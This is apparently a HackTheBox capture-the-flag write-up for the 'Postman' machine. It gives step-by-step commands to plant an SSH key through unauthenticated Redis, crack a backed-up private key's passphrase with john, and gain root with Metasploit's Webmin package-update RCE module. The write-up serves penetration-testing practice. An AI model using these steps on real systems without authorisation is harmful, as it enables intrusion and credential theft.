Postman is an easy marked box in HackTheBox, it just retired and here's my writeup!
First, let's add the hostname postman to the hosts file so that, we don't always need to type in the IP address.
vi /etc/hosts
Hit i (going to input mode)
10.10.10.160 postman
[esc]
:x (saving and exiting)
Now, let's run a nmap scan to see what services are running. We will be checking for all the ports, therefore the -p- option.
nmap -A -T4 -p- 10.10.10.160
SSL - 21
http - 80
Miniserv 1.910 - 10000
redis - 6379
Miniserv at port 10000, that's something that I haven't seen very often. Let's check if it has a webpage.
We can see a webmin login prompt, trying admin/admin there, doesn't give us anything and I don't think bruteforce is the name of the game here.
Now, the other interesting service available is redis, to check the redis port,
apt-get install redis-tools #installing redis command line tools
redis-cli -h postman #connecting to the postman server via redis-cli
ping #checking the connection
pong #we get a pong back, that's nice
Now that we know that the connection works fine, let's quit it.
This version of redis has a common vulnerability. You can check it out at: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
As suggested by packet storm security, let's try generating a rsa key and see if that works.
ssh-keygen -t rsa -C "redis@postman"
Create the private/public key pair and save them both at ~/HTB/Postman.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
Now, let's upload the contents of the test.txt file to the redis server.
cat test.txt | redis-cli -h 10.10.10.160 -x set crackit
The -x option tells redis-cli to read the last argument from STDIN, which is our case, is the content of test.txt.
redis-cli -h 10.10.10.160
config get dir
config set dbfilename "authorized_keys"
save
quit
We saved the contents of our test.txt file as authorized_keys in the server.
Now, lets try to login with the private-public key pair.
ssh -i id_rsa redis@10.10.10.160
You are in!
Got the initial foothold, now time for privesc!
cd /opt/
ls
When you ls there, you should see id_rsa.bak file.
That's interesting, we should checkout if it really is a backup of id_rsa file, in which case, our job will be really easy.
cat id_rsa.bak
Copy all of it and in another terminal window, in our attacking machine,
vi ~/HTB/Postman/id_rsa.bak
Again, Hit i and go to the input mode and paste everything there.
[esc]
:x To save and exit.
Now, we will try to crack the password used with the rsa key.
updatedb
locate ssh2john.py #finds where ssh2john.py file is
cp $(locate ssh2john.py) . #copies the ssh2john.py file from wherever it is to the present working directory
python ssh2john.py id_rsa.bak > id_rsa.bak.hash #converts it to a john usable format
john id_rsa.bak.hash -wordlist=rockyou.txt #using the rockyou.txt file and john, we try to crack the password
You should get a password, "computer2008".
However, when you try to ssh in, you will be denied.
Now, go back to the window where you are logged in as redis user.
su Matt
Give the password as, computer2008
Boom!
You are user now!
cd ~
cat user.txt
Now, go to the browser and try to login to the webmin using Matt's credentials (notice that it is Matt and not matt).
So, that works.
Now, logout as Matt user from the terminal and webmin.
Back in your kali machine,
msfconsole
search webmin
use linux/http/webmin_packageup_rce
options
set rhosts postman
set password computer2008
set username Matt
set ssl true
set lhost <your kali machine's ip>
exploit
And that should work!
Congratulations, you're root now!
cat /root/root.txt
Thank you for reading, feel free to share it if you like it!
- root@abhizer